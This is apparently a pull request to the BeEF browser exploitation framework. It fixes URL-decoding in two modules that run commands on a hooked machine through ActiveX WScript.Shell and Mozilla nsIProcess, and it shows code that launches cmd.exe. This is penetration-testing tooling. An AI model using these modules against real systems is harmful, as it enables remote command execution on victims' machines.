### PR TITLE
Fix URL-encoded command passed to shell execution modules

### DIFF
--- a/modules/exploits/local_host/activex_command_execution/command.js
+++ b/modules/exploits/local_host/activex_command_execution/command.js
@@ -6,7 +6,7 @@
 
 beef.execute(function() {
 
-	var cmd = beef.encode.base64.decode('<%= Base64.strict_encode64(@cmd) %>');
+	var cmd = decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@cmd) %>'));
 	var result = "command was not sent";
 
 	try {

--- a/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
+++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js
@@ -9,7 +9,7 @@ beef.execute(function() {
 	var result = "command sent";
 
 	try {
-		var command_str = beef.encode.base64.decode('<%= Base64.strict_encode64(@command_str) %>');
+		var command_str = decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@command_str) %>'));
 		var getWorkingDir= Components.classes["@mozilla.org/file/directory_service;1"].getService(Components.interfaces.nsIProperties).get("Home",Components.interfaces.nsIFile);
 		var lFile = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
 		var lPath = "C:\\WINDOWS\\system32\\cmd.exe"; // maybe "%WINDIR%\\system32\\cmd.exe" would work?


### PR DESCRIPTION
## Description

When a command module value is decoded with `beef.encode.base64.decode`, the result is URL-escaped, because `decode` uses `escape(atob(input))` (`core/main/client/encode/base64.js`). Any command containing spaces or special characters (e.g. `cmd.exe /c "echo Hello from BeEF!"`) was therefore delivered percent-encoded to the browser and never executed.

## Fix

Wrap the decoded value in `decodeURIComponent` in the two modules that pass it to a shell/process runner, matching the pattern already used by the other command modules (`deface_web_page`, `blockui`, `fake_notification`, ...):

- `modules/exploits/local_host/activex_command_execution/command.js` (`WScript.Shell.Run`)
- `modules/exploits/local_host/mozilla_nsiprocess_interface/command.js` (`nsIProcess`)

Fixes #1854